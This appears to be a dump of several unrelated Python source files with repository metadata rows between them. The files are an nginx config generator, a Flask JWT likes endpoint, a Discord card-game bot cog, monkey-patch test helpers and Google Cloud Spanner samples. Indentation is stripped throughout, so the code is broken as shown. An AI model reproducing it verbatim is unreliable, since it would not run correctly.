if os.path.exists(nginx_conf_custom_fn):
yaml = rtyaml.load(open(nginx_conf_custom_fn))
if domain in yaml:
yaml = yaml[domain]
# any proxy or redirect here?
for path, url in yaml.get("proxies", {}).items():
nginx_conf_extra += "\tlocation %s {" % path
nginx_conf_extra += "\n\t\tproxy_pass %s;" % url
nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;"
nginx_conf_extra += "\n\t}\n"
for path, alias in yaml.get("aliases", {}).items():
nginx_conf_extra += "\tlocation %s {" % path
nginx_conf_extra += "\n\t\talias %s;" % alias
nginx_conf_extra += "\n\t}\n"
for path, url in yaml.get("redirects", {}).items():
nginx_conf_extra += "\trewrite %s %s permanent;\n" % (path, url)
# override the HSTS directive type
hsts = yaml.get("hsts", hsts)
# Add the HSTS header.
if hsts == "yes":
nginx_conf_extra += "add_header Strict-Transport-Security max-age=15768000;\n"
elif hsts == "preload":
nginx_conf_extra += "add_header Strict-Transport-Security \"max-age=15768000; includeSubDomains; preload\";\n"
# Add in any user customizations in the includes/ folder.
nginx_conf_custom_include = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(domain) + ".conf")
if os.path.exists(nginx_conf_custom_include):
nginx_conf_extra += "\tinclude %s;\n" % (nginx_conf_custom_include)
# PUT IT ALL TOGETHER
# Combine the pieces. Iteratively place each template into the "# ADDITIONAL DIRECTIVES HERE" placeholder
# of the previous template.
nginx_conf = "# ADDITIONAL DIRECTIVES HERE\n"
for t in templates + [nginx_conf_extra]:
nginx_conf = re.sub("[ \t]*# ADDITIONAL DIRECTIVES HERE *\n", t, nginx_conf)
# Replace substitution strings in the template & return.
nginx_conf = nginx_conf.replace("$STORAGE_ROOT", env['STORAGE_ROOT'])
nginx_conf = nginx_conf.replace("$HOSTNAME", domain)
nginx_conf = nginx_conf.replace("$ROOT", root)
nginx_conf = nginx_conf.replace("$SSL_KEY", tls_cert["private-key"])
nginx_conf = nginx_conf.replace("$SSL_CERTIFICATE", tls_cert["certificate"])
nginx_conf = nginx_conf.replace("$REDIRECT_DOMAIN", re.sub(r"^www\.", "", domain)) # for default www redirects to parent domain
return nginx_conf
def get_web_root(domain, env, test_exists=True):
# Try STORAGE_ROOT/web/domain_name if it exists, but fall back to STORAGE_ROOT/web/default.
for test_domain in (domain, 'default'):
root = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(test_domain))
if os.path.exists(root) or not test_exists: break
return root
def get_web_domains_info(env):
www_redirects = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False))
has_root_proxy_or_redirect = set(get_web_domains_with_root_overrides(env))
ssl_certificates = get_ssl_certificates(env)
# for the SSL config panel, get cert status
def check_cert(domain):
try:
tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True)
except OSError: # PRIMARY_HOSTNAME cert is missing
tls_cert = None
if tls_cert is None: return ("danger", "No certificate installed.")
cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"])
if cert_status == "OK":
return ("success", "Signed & valid. " + cert_status_details)
elif cert_status == "SELF-SIGNED":
return ("warning", "Self-signed. Get a signed certificate to stop warnings.")
else:
return ("danger", "Certificate has a problem: " + cert_status)
return [
{
"domain": domain,
"root": get_web_root(domain, env),
"custom_root": get_web_root(domain, env, test_exists=False),
"ssl_certificate": check_cert(domain),
"static_enabled": domain not in (www_redirects | has_root_proxy_or_redirect),
}
for domain in get_web_domains(env)
]
| 41.741667
| 128
| 0.729387
|
4a07dcaeb700f605cea63b1f679a5579981351cf
| 899
|
py
|
Python
|
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
from flask import request
from flask_restx import Resource
from flask_jwt_extended import jwt_required, get_jwt_identity
from services.likes_service import init_service, get_likes, add_likes, remove_likes
def init_likes_controller(api, app):
init_service(app)
#game_model = get_game_model(api)
class UserLikesList(Resource):
"""A resource controller for the likes from users on a game"""
@jwt_required
def get(self, game_id):
return get_likes(game_id)
@jwt_required
def post(self, game_id):
identity = get_jwt_identity()
return add_likes(game_id, identity['user_id'])
@jwt_required
def delete(self, game_id):
identity = get_jwt_identity()
return remove_likes(game_id, identity['user_id'])
api.add_resource(UserLikesList, '/games/<string:game_id>/likes')
| 31
| 83
| 0.681869
|
4a07ddae2836d5fab1fcbcffe6348e9eec4dc484
| 9,893
|
py
|
Python
|
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | null | null | null |
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | 1
|
2021-01-31T12:37:06.000Z
|
2021-01-31T12:37:06.000Z
|
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | null | null | null |
import discord
from typing import Literal
from random import randint
from asyncio import sleep, TimeoutError
from redbot.core import bank, commands, Config
from redbot.core.i18n import Translator, cog_i18n
from .generators import embed
from .cards import BACKALL
_ = Translator("HigherOrLower", __file__)
@cog_i18n(_)
class HigherOrLower(commands.Cog):
"""
Play the higher or lower card game!
For more information, take a read [here](https://kreusadacogs.readthedocs.io/en/latest/higherorlower.html#higherorlower).
"""
__author__ = "Kreusada"
__version__ = "1.3.0"
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, 439583, force_registration=True)
self.config.register_guild(
bank=False,
round=0,
per=0,
qs=9
)
self.config.register_user(
draw=None,
image=False,
count=1
)
def format_help_for_context(self, ctx: commands.Context) -> str:
"""Thanks Sinbad."""
return f"{super().format_help_for_context(ctx)}\n\nAuthor: {self.__author__}\nVersion: {self.__version__}"
async def red_delete_data_for_user(
self,
requester: Literal["discord", "owner", "user", "user_strict"],
user_id: int
) -> None:
await self.config.user_from_id(user_id).clear()
@commands.command()
async def hol(self, ctx: commands.Context):
"""
Play higher or lower!
Guess if the next number will be higher or lower based on a standard pack of cards.
For more information, please take a look [here](https://kreusadacogs.readthedocs.io/en/latest/higherorlower.html#higherorlower).
"""
banke = await self.config.guild(ctx.guild).bank()
currency = await bank.get_currency_name(ctx.guild)
per = await self.config.guild(ctx.guild).per()
round = await self.config.guild(ctx.guild).round()
qs = await self.config.guild(ctx.guild).qs()
await ctx.send(f"Let's get started {ctx.author.name}. Remember to answer with either `higher`, `h`, `lower` or `l`.")
def check(x):
return x.author == ctx.author and x.channel == ctx.channel and x.content.lower().startswith(("h", "l"))
for i in range(int(qs)):
draw = await self.config.user(ctx.author).draw()
msg = f"❌ Oh no {ctx.author.name}! "
if not draw:
A = randint(2, 14)
else:
A = draw
B = randint(2, 14)
await sleep(1)
E = await embed(ctx.author.name, A, await self.config.user(ctx.author).image(), await self.config.user(ctx.author).count(), qs)
await ctx.send(embed=E)
try:
choice = await self.bot.wait_for("message", timeout=40, check=check)
except TimeoutError:
e = discord.Embed(description=msg + "You took too long to respond.", color=0xFF0000)
await ctx.send(embed=e)
await self.config.user(ctx.author).draw.set(None)
await self.config.user(ctx.author).count.set(1)
break
if choice.content.lower().startswith(("h")) and B > A or choice.content.lower().startswith(("l")) and B < A:
e = discord.Embed(description=f"✅ Great work! The next number is...", color=0x00FF00)
if banke is True:
await bank.deposit_credits(ctx.author, per)
e.set_footer(text=f"+{per} has been added to your bank account.")
await ctx.send(embed=e)
await self.config.user(ctx.author).draw.set(B)
count = await self.config.user(ctx.author).count()
count += 1
await self.config.user(ctx.author).count.set(count)
continue
elif choice.content.lower().startswith("h") and B == A or choice.content.lower().startswith("l") and B == A:
e = discord.Embed(description=f"😌 The results were the same! The next number is...", color=0xFFFF00)
if banke is True:
e.set_footer(text=f"+{per} has been added to your bank account.")
await bank.deposit_credits(ctx.author, per)
await ctx.send(embed=e)
await self.config.user(ctx.author).draw.set(B)
count = await self.config.user(ctx.author).count()
count += 1
await self.config.user(ctx.author).count.set(count)
continue
else:
if B == 11:
B = "Jack"
elif B == 12:
B = "Queen"
elif B == 13:
B = "King"
elif B == 14:
B = "Ace"
else:
B = B
e = discord.Embed(description=f"❌ Oh no {ctx.author.name}! The next card was a {B}.", color=0xFF0000)
await ctx.send(embed=e)
await self.config.user(ctx.author).draw.set(None)
await self.config.user(ctx.author).count.set(1)
break
else:
if banke is True:
await bank.deposit_credits(ctx.author, round)
description = f"🎉 You MADE IT {ctx.author.name}!! Awesome work!\n{round} {currency} has been added to your bank account."
E = discord.Embed(description=description, color=0x00FF00)
await ctx.send(embed=E)
else:
E = discord.Embed(description=f"🎉 You MADE IT {ctx.author.name}!! Awesome work!", color=0x00FF00)
await ctx.send(embed=E)
await self.config.user(ctx.author).draw.set(None)
await self.config.user(ctx.author).count.set(1)
@commands.group()
async def holset(self, ctx: commands.Context):
"""Settings for higher or lower."""
@holset.command()
@commands.mod_or_permissions(administrator=True)
async def perpayout(self, ctx: commands.Context, payout: int):
"""Sets the bank payout per answer."""
currency = await bank.get_currency_name(ctx.guild)
if payout > 1000:
await ctx.send(f"{payout} exceeds the maximum payout. Please go lower.")
else:
await self.config.guild(ctx.guild).per.set(payout)
await ctx.send(f"Done. Users will now receive {payout} {currency} when they correctly guess a card.")
@holset.command()
@commands.mod_or_permissions(administrator=True)
async def total(self, ctx: commands.Context, cards: int):
"""
Set the total of answered cards needed to win.
This value defaults to 9.
"""
currency = await bank.get_currency_name(ctx.guild)
if cards <= 3:
await ctx.send(f"Setting the required cards to {int(cards)} would be too easy. Please go higher.")
elif cards >= 20:
await ctx.send(f"Setting the required cards to {int(cards)}... would that even be possible? Please go lower.")
else:
await self.config.guild(ctx.guild).qs.set(cards)
await ctx.send(f"Users will now have to answer {int(cards)} cards correctly before winning.")
@holset.command()
@commands.mod_or_permissions(administrator=True)
async def roundpayout(self, ctx: commands.Context, payout: int):
"""Sets the bank payout if all 9 cards are correctly guessed."""
currency = await bank.get_currency_name(ctx.guild)
if payout > 100000:
await ctx.send(f"{payout} exceeds the maximum payout. Please go lower.")
else:
await self.config.guild(ctx.guild).round.set(payout)
await ctx.send(f"Done. Users will now receive {payout} {currency} when they correctly guess all nine cards.")
@holset.command()
@commands.mod_or_permissions(administrator=True)
async def togglebank(self, ctx: commands.Context, true_or_false: bool = False):
"""Toggle the bank ON. Defaults to False."""
if true_or_false is False:
await self.config.guild(ctx.guild).bank.set(False)
await ctx.send(
f"The bank is now off.\n"
f"You can turn it on by using `{ctx.clean_prefix}holset togglebank true`."
)
else:
await self.config.guild(ctx.guild).bank.set(True)
await ctx.send(
f"The bank is now ON.\n"
f"Round payout: {int(await self.config.guild(ctx.guild).round())} <-"
f"`Modify using {ctx.clean_prefix}holset roundpayout`.\n"
f"Per-card payout: {int(await self.config.guild(ctx.guild).per())} <-"
f"`Modify using {ctx.clean_prefix}holset perpayout`."
)
@holset.command()
async def image(self, ctx: commands.Context, true_or_false: bool):
"""
Specify whether you would like an image card.
Defaults are set to False (thumbnail).
"""
if true_or_false is False:
await self.config.user(ctx.author).image.set(False)
E = discord.Embed(title="Thumbnail responses", description="Embeds will now be sent like this.", color=0xFF0000)
E.set_thumbnail(url=BACKALL)
E.set_footer(text="The image stays nice and small, perfect for mobile.")
await ctx.send(embed=E)
else:
await self.config.user(ctx.author).image.set(True)
E = discord.Embed(title="Image responses", description="Embeds will now be sent like this.", color=0xFF0000)
E.set_image(url=BACKALL)
E.set_footer(text="The image is nice and large, perfect for desktop.")
await ctx.send(embed=E)
| 45.800926
| 139
| 0.585363
|
4a07ded362ec5d0241f53ffe7d71f90a0bd04903
| 907
|
py
|
Python
|
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
# Standard modules
# External modules
# Internal modules
def patch_returner(obj, name, fake_method_return_value):
fake_returner = create_fake_returner(fake_method_return_value)
monkey_patch(obj, name, fake_returner)
def patch_caller(obj, name, function_to_call, *args, **kwargs):
fake_caller = create_fake_caller(function_to_call, *args, **kwargs)
monkey_patch(obj, name, fake_caller)
def monkey_patch(obj, name, function):
bound_method = function.__get__(obj)
setattr(obj, name, bound_method)
def create_fake_returner(fake_returner_return_value):
def fake_returner(self, *method_args, **method_kwargs):
return fake_returner_return_value
return fake_returner
def create_fake_caller(function_to_call):
def fake_caller(self, *method_args, **method_kwargs):
return function_to_call(*method_args, **method_kwargs)
return fake_caller
| 25.914286
| 71
| 0.757442
|
4a07ded3ca997fbbd62c475abf683131d9220196
| 16,708
|
py
|
Python
|
spanner/cloud-client/snippets.py
|
arbatovdan/new
|
f36d2bf4846061ea22b35775c8074bcd5bec3788
|
[
"Apache-2.0"
] | 1
|
2017-06-28T13:04:34.000Z
|
2017-06-28T13:04:34.000Z
|
spanner/cloud-client/snippets.py
|
Acidburn0zzz/python-docs-samples
|
bc0924a6826cbdb669415b58fd5b2d8534d87aa1
|
[
"Apache-2.0"
] | null | null | null |
spanner/cloud-client/snippets.py
|
Acidburn0zzz/python-docs-samples
|
bc0924a6826cbdb669415b58fd5b2d8534d87aa1
|
[
"Apache-2.0"
] | 1
|
2021-01-13T21:45:31.000Z
|
2021-01-13T21:45:31.000Z
|
#!/usr/bin/env python
# Copyright 2016 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to do basic operations using Cloud
Spanner.
For more information, see the README.rst under /spanner.
"""
import argparse
from google.cloud import spanner
def create_database(instance_id, database_id):
"""Creates a database and tables for sample data."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id, ddl_statements=[
"""CREATE TABLE Singers (
SingerId INT64 NOT NULL,
FirstName STRING(1024),
LastName STRING(1024),
SingerInfo BYTES(MAX)
) PRIMARY KEY (SingerId)""",
"""CREATE TABLE Albums (
SingerId INT64 NOT NULL,
AlbumId INT64 NOT NULL,
AlbumTitle STRING(MAX)
) PRIMARY KEY (SingerId, AlbumId),
INTERLEAVE IN PARENT Singers ON DELETE CASCADE"""
])
operation = database.create()
print('Waiting for operation to complete...')
operation.result()
print('Created database {} on instance {}'.format(
database_id, instance_id))
def insert_data(instance_id, database_id):
"""Inserts sample data into the given database.
The database and table must already exist and can be created using
`create_database`.
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
with database.batch() as batch:
batch.insert(
table='Singers',
columns=('SingerId', 'FirstName', 'LastName',),
values=[
(1, u'Marc', u'Richards'),
(2, u'Catalina', u'Smith'),
(3, u'Alice', u'Trentor'),
(4, u'Lea', u'Martin'),
(5, u'David', u'Lomond')])
batch.insert(
table='Albums',
columns=('SingerId', 'AlbumId', 'AlbumTitle',),
values=[
(1, 1, u'Go, Go, Go'),
(1, 2, u'Total Junk'),
(2, 1, u'Green'),
(2, 2, u'Forever Hold Your Peace'),
(2, 3, u'Terrified')])
print('Inserted data.')
def query_data(instance_id, database_id):
"""Queries sample data from the database using SQL."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
results = database.execute_sql(
'SELECT SingerId, AlbumId, AlbumTitle FROM Albums')
for row in results:
print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
def read_data(instance_id, database_id):
"""Reads sample data from the database."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
keyset = spanner.KeySet(all_=True)
results = database.read(
table='Albums',
columns=('SingerId', 'AlbumId', 'AlbumTitle',),
keyset=keyset,)
for row in results:
print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
def query_data_with_new_column(instance_id, database_id):
"""Queries sample data from the database using SQL.
This sample uses the `MarketingBudget` column. You can add the column
by running the `add_column` sample or by running this DDL statement against
your database:
ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
results = database.execute_sql(
'SELECT SingerId, AlbumId, MarketingBudget FROM Albums')
for row in results:
print(u'SingerId: {}, AlbumId: {}, MarketingBudget: {}'.format(*row))
def add_index(instance_id, database_id):
"""Adds a simple index to the example database."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
operation = database.update_ddl([
'CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)'])
print('Waiting for operation to complete...')
operation.result()
print('Added the AlbumsByAlbumTitle index.')
def query_data_with_index(
instance_id, database_id, start_title='Aardvark', end_title='Goo'):
"""Queries sample data from the database using SQL and an index.
The index must exist before running this sample. You can add the index
by running the `add_index` sample or by running this DDL statement against
your database:
CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)
This sample also uses the `MarketingBudget` column. You can add the column
by running the `add_column` sample or by running this DDL statement against
your database:
ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
"""
from google.cloud.proto.spanner.v1 import type_pb2
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
params = {
'start_title': start_title,
'end_title': end_title
}
param_types = {
'start_title': type_pb2.Type(code=type_pb2.STRING),
'end_title': type_pb2.Type(code=type_pb2.STRING)
}
results = database.execute_sql(
"SELECT AlbumId, AlbumTitle, MarketingBudget "
"FROM Albums@{FORCE_INDEX=AlbumsByAlbumTitle} "
"WHERE AlbumTitle >= @start_title AND AlbumTitle < @end_title",
params=params, param_types=param_types)
for row in results:
print(
u'AlbumId: {}, AlbumTitle: {}, '
'MarketingBudget: {}'.format(*row))
def read_data_with_index(instance_id, database_id):
"""Reads sample data from the database using an index.
The index must exist before running this sample. You can add the index
by running the `add_index` sample or by running this DDL statement against
your database:
CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
keyset = spanner.KeySet(all_=True)
results = database.read(
table='Albums',
columns=('AlbumId', 'AlbumTitle'),
keyset=keyset,
index='AlbumsByAlbumTitle')
for row in results:
print('AlbumId: {}, AlbumTitle: {}'.format(*row))
def add_storing_index(instance_id, database_id):
"""Adds an storing index to the example database."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
operation = database.update_ddl([
'CREATE INDEX AlbumsByAlbumTitle2 ON Albums(AlbumTitle)'
'STORING (MarketingBudget)'])
print('Waiting for operation to complete...')
operation.result()
print('Added the AlbumsByAlbumTitle2 index.')
def read_data_with_storing_index(instance_id, database_id):
"""Reads sample data from the database using an index with a storing
clause.
The index must exist before running this sample. You can add the index
by running the `add_soring_index` sample or by running this DDL statement
against your database:
CREATE INDEX AlbumsByAlbumTitle2 ON Albums(AlbumTitle)
STORING (MarketingBudget)
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
keyset = spanner.KeySet(all_=True)
results = database.read(
table='Albums',
columns=('AlbumId', 'AlbumTitle', 'MarketingBudget'),
keyset=keyset,
index='AlbumsByAlbumTitle2')
for row in results:
print(
u'AlbumId: {}, AlbumTitle: {}, '
'MarketingBudget: {}'.format(*row))
def add_column(instance_id, database_id):
"""Adds a new column to the Albums table in the example database."""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
operation = database.update_ddl([
'ALTER TABLE Albums ADD COLUMN MarketingBudget INT64'])
print('Waiting for operation to complete...')
operation.result()
print('Added the MarketingBudget column.')
def update_data(instance_id, database_id):
"""Updates sample data in the database.
This updates the `MarketingBudget` column which must be created before
running this sample. You can add the column by running the `add_column`
sample or by running this DDL statement against your database:
ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
with database.batch() as batch:
batch.update(
table='Albums',
columns=(
'SingerId', 'AlbumId', 'MarketingBudget'),
values=[
(1, 1, 100000),
(2, 2, 500000)])
print('Updated data.')
def read_write_transaction(instance_id, database_id):
"""Performs a read-write transaction to update two sample records in the
database.
This will transfer 200,000 from the `MarketingBudget` field for the second
Album to the first Album. If the `MarketingBudget` is too low, it will
raise an exception.
Before running this sample, you will need to run the `update_data` sample
to populate the fields.
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
def update_albums(transaction):
# Read the second album budget.
second_album_keyset = spanner.KeySet(keys=[(2, 2)])
second_album_result = transaction.read(
table='Albums', columns=('MarketingBudget',),
keyset=second_album_keyset, limit=1)
second_album_row = list(second_album_result)[0]
second_album_budget = second_album_row[0]
transfer_amount = 200000
if second_album_budget < 300000:
# Raising an exception will automatically roll back the
# transaction.
raise ValueError(
'The second album doesn\'t have enough funds to transfer')
# Read the first album's budget.
first_album_keyset = spanner.KeySet(keys=[(1, 1)])
first_album_result = transaction.read(
table='Albums', columns=('MarketingBudget',),
keyset=first_album_keyset, limit=1)
first_album_row = list(first_album_result)[0]
first_album_budget = first_album_row[0]
# Update the budgets.
second_album_budget -= transfer_amount
first_album_budget += transfer_amount
print(
'Setting first album\'s budget to {} and the second album\'s '
'budget to {}.'.format(
first_album_budget, second_album_budget))
# Update the rows.
transaction.update(
table='Albums',
columns=(
'SingerId', 'AlbumId', 'MarketingBudget'),
values=[
(1, 1, first_album_budget),
(2, 2, second_album_budget)])
database.run_in_transaction(update_albums)
print('Transaction complete.')
def read_only_transaction(instance_id, database_id):
"""Reads data inside of a read-only transaction.
Within the read-only transaction, or "snapshot", the application sees
consistent view of the database at a particular timestamp.
"""
spanner_client = spanner.Client()
instance = spanner_client.instance(instance_id)
database = instance.database(database_id)
with database.snapshot() as snapshot:
# Read using SQL.
results = snapshot.execute_sql(
'SELECT SingerId, AlbumId, AlbumTitle FROM Albums')
print('Results from first read:')
for row in results:
print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
# Perform another read using the `read` method. Even if the data
# is updated in-between the reads, the snapshot ensures that both
# return the same data.
keyset = spanner.KeySet(all_=True)
results = snapshot.read(
table='Albums',
columns=('SingerId', 'AlbumId', 'AlbumTitle',),
keyset=keyset,)
print('Results from second read:')
for row in results:
print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'instance_id', help='Your Cloud Spanner instance ID.')
parser.add_argument(
'--database-id', help='Your Cloud Spanner database ID.',
default='example_db')
subparsers = parser.add_subparsers(dest='command')
subparsers.add_parser('create_database', help=create_database.__doc__)
subparsers.add_parser('insert_data', help=insert_data.__doc__)
subparsers.add_parser('query_data', help=query_data.__doc__)
subparsers.add_parser('read_data', help=read_data.__doc__)
subparsers.add_parser('add_column', help=add_column.__doc__)
subparsers.add_parser('update_data', help=update_data.__doc__)
subparsers.add_parser(
'query_data_with_new_column', help=query_data_with_new_column.__doc__)
subparsers.add_parser(
'read_write_transaction', help=read_write_transaction.__doc__)
subparsers.add_parser(
'read_only_transaction', help=read_only_transaction.__doc__)
subparsers.add_parser('add_index', help=add_index.__doc__)
query_data_with_index_parser = subparsers.add_parser(
'query_data_with_index', help=query_data_with_index.__doc__)
query_data_with_index_parser.add_argument(
'--start_title', default='Aardvark')
query_data_with_index_parser.add_argument(
'--end_title', default='Goo')
subparsers.add_parser('read_data_with_index', help=insert_data.__doc__)
subparsers.add_parser('add_storing_index', help=add_storing_index.__doc__)
subparsers.add_parser(
'read_data_with_storing_index', help=insert_data.__doc__)
args = parser.parse_args()
if args.command == 'create_database':
create_database(args.instance_id, args.database_id)
elif args.command == 'insert_data':
insert_data(args.instance_id, args.database_id)
elif args.command == 'query_data':
query_data(args.instance_id, args.database_id)
elif args.command == 'read_data':
read_data(args.instance_id, args.database_id)
elif args.command == 'add_column':
add_column(args.instance_id, args.database_id)
elif args.command == 'update_data':
update_data(args.instance_id, args.database_id)
elif args.command == 'query_data_with_new_column':
query_data_with_new_column(args.instance_id, args.database_id)
elif args.command == 'read_write_transaction':
read_write_transaction(args.instance_id, args.database_id)
elif args.command == 'read_only_transaction':
read_only_transaction(args.instance_id, args.database_id)
elif args.command == 'add_index':
add_index(args.instance_id, args.database_id)
elif args.command == 'query_data_with_index':
query_data_with_index(
args.instance_id, args.database_id,
args.start_title, args.end_title)
elif args.command == 'read_data_with_index':
read_data_with_index(args.instance_id, args.database_id)
elif args.command == 'add_storing_index':
add_storing_index(args.instance_id, args.database_id)
elif args.command == 'read_data_with_storing_index':
read_data_with_storing_index(args.instance_id, args.database_id)
| 35.473461
| 79
| 0.672253
|
4a07e0e40f46587fd9d86ecaa7cfd6a18e85c85d
| 467
|
py
|
Python
|
modules/app/admin/admin.py
|
uwrit/kpmp-user-portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | 1
|
2019-05-01T00:43:59.000Z
|
2019-05-01T00:43:59.000Z
|
modules/app/admin/admin.py
|
uwrit/kpmp-user-portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | 7
|
2019-03-17T02:19:21.000Z
|
2019-03-29T15:11:53.000Z
|
modules/app/admin/admin.py
|
uwrit/kpmp_user_portal
|
d20ce6290a0ad64f63a6f043bf6ff061b4968953
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_admin import Admin
from modules.app import mongo, app
from .user import UserView
from .client import ClientView
from .org import OrganizationView
from .group import GroupView
admin = Admin(app, name='KPMP User Portal Admin Panel')
admin.add_view(UserView(mongo.db.users, 'Users'))
admin.add_view(OrganizationView(mongo.db.orgs, 'Organizations'))
admin.add_view(GroupView(mongo.db.groups, 'Groups'))
admin.add_view(ClientView(mongo.db.clients, 'Clients'))
| 35.923077
| 64
| 0.796574
|
4a07e0f35ede05e1e3742646f24f0e40ebee555f
| 2,041
|
py
|
Python
|
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
Analysis/Plot_Spect.py
|
ry-dgel/self-phase
|
d55167d4ed5430cde52fa54b738d5b209a44582c
|
[
"MIT"
] | null | null | null |
import sys
from itertools import groupby
import yaml
import matplotlib
from matplotlib import pyplot as plt
import numpy as np
font = {'family' : 'normal',
'size' : 22}
matplotlib.rc('font', **font)
cf = 6.626e-34 * 6.242e18
def norm_spectrum(data_set):
re, im = data_set.T
Ef = np.fft.fftshift(np.fft.fft(np.fft.fftshift(re+im*1j)))
re = np.real(Ef)
im = np.imag(Ef)
norm = np.sqrt(np.power(re,2) + np.power(im,2))
return norm/max(norm)
folder = sys.argv[1]
data_list = [] # Initialize array of datasets. Each element is a time step.
with open(folder + "/E") as f:
# Split datafile into sections separated by empty lines
for k, g in groupby(f, lambda x: x == "\n"):
if not k:
# Split line of data after comma, striping whitespace.
data_list.append(np.array([[float(x) for x in d.split(',')]
for d in g if len(d.strip())]))
with open(folder + "/params") as f:
p = yaml.load(f)
for key, val in p.items():
p[key] = float(val)
# y axis
dt = p["tmax"]/(p["Nt"]-1) # Time step
points = np.arange(-p["Nt"]/2,p["Nt"]/2+1,1)
t = points*dt # Time grid iterator
f = points/p["tmax"] # Frequency grid 0 centered
f = f + 299792458/p["lambda"]
g = f[np.where(f > 0)]
ev = g * cf
wl = 1239.84193/ev
X, Y = np.meshgrid(np.linspace(0,2.5, len(data_list)), wl[wl < 1200])
# frequency axis
# Initialize figure
data_list = [norm_spectrum(data_set) for data_set in data_list]
data_list = [spectrum[np.where(f>0)] for spectrum in data_list]
data_list = [spectrum[np.where(wl<1200)] for spectrum in data_list]
data_list = [spectrum * np.power(ev[np.where(wl<1200)],2)/1239.84193 for spectrum in data_list]
spectra = np.array([[spectrum] for spectrum in data_list])[:,0,:]
fig, ax = plt.subplots(1)
plt.pcolormesh(X, Y, spectra.T, figure=fig, cmap="plasma")
ax.set_ylim(564,1130)
#ax.set_ylim(500,1100)
ax.set_xlabel("Propagation Length (m)")
ax.set_ylabel("Wavelength (nm)")
plt.show()
| 31.890625
| 95
| 0.631063
|
4a07e176d7a518415f0fdc673f4a603df30b77c5
| 33,048
|
py
|
Python
|
test/unit/__init__.py
|
hbhdytf/mac
|
51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
test/unit/__init__.py
|
hbhdytf/mac
|
51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
test/unit/__init__.py
|
hbhdytf/mac
|
